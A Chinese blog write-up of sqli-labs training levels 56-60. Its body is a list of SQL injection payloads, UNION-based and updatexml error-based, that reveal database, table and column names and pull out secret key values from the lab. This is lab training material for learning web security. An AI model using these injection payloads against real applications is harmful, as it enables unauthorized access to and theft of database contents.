当前位置: 首页 > article >正文

sqli-labs靶场(56-60)

article 2024/9/24 21:27:07

56关

?id=-1')union select 1,2,database()--+  看数据库

?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+  看表

?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='5k7pxhtjq1'--+  看列

然后就是key的值了

?id=-1') union select 1,group_concat(secret_RSHU),3 from 5k7pxhtjq1--+

57关

这关跟上边一样但是用双引号闭合

查数据库

?id=-1"union select 1,database(),version()--+

查到表名bxvue0mivj

?id=-1" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

在查看列

?id=-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='bxvue0mivj'--+

58关

?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+
爆表名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='o5jav1pxvu'),0x7e),1)--+
爆列名

?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_6HR1) from challenges.o5jav1pxvu),0x7e),1)--+

59关

查数据库?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

?id=1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q

查到表名

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='add90s9njg' limit 0,1),0x7e),1)-- q

id=1 and updatexml(1,concat(0x7e,(select secret_CYFO from add90s9njg limit 0,1),0x7e),1)-- q

60关

跟上边一样闭合不同

?id=1") and updatexml(1,concat(0x7e,database(),0x7e),1)-- q

?id=1") and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)-- q  查表

?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='4cnqwjiczk' limit 0,1),0x7e),1)-- q  查列

id=1") and updatexml(1,concat(0x7e,(select secret_0LPA from 4cnqwjiczk limit 0,1),0x7e),1)-- q


http://www.kler.cn/news/293257.html

相关文章:

  • 云计算之ECS
  • 常工院星闪节能团队参加悉尼大学设计交流项目
  • 中间代码例题
  • OSPF 协议介绍
  • Zipkin链路追踪②:如何集成?
  • 网络训练和推理过程
  • Android切换日夜模式导致Activity重建
  • C/C++的自由落体运动
  • 服务器数据恢复—磁盘坏扇区导致raid6阵列崩溃的数据恢复案例
  • 校园体育装备展-2025中国(深圳)国际学校体育装备展览会
  • 【Kafka】怎么解决Kafka消费者消费堆积问题?
  • windows 11/ubuntu Teredo 设置 (ipv4 转 ipv6)
  • 数据结构之——顺序表中基本操作的实现
  • 读懂以太坊源码(2)-重要概念Gas
  • 【Kubernetes 】k8s常用单词
  • Linux:深入剖析计算机软硬件架构
  • 单一职责原则介绍
  • Gartner报告解读:如何帮助企业完善数据分析与治理路线图
  • Jmeter模拟用户登录时获取token如何跨线程使用?
  • PostgreSQL技术内幕8:PostgreSQL查询执行器
  • 完整指南:CNStream流处理多路并发框架适配到NVIDIA Jetson Orin (二) 源码架构流程梳理、代码编写
  • Python爬虫01
  • 代码随想录:343. 整数拆分
  • ECMAScript与JavaScript的区别:深入解析与代码示例
  • MP条件构造器之常用功能详解(select、set)
  • MySQL——事务与存储过程(三)存储过程的使用(4)删除存储过程
  • 三星的新款笔记本电脑AI性能提升一倍
  • vite创建的vue项目怎么使用jsx来实现elementPlus表格表尾的合计有多行大的方法
  • 【全网最全】2024年数学建模国赛D题39页成品论文+matlab代码+结果等(后续会更新)
  • 身份验证技术应用10大关键趋势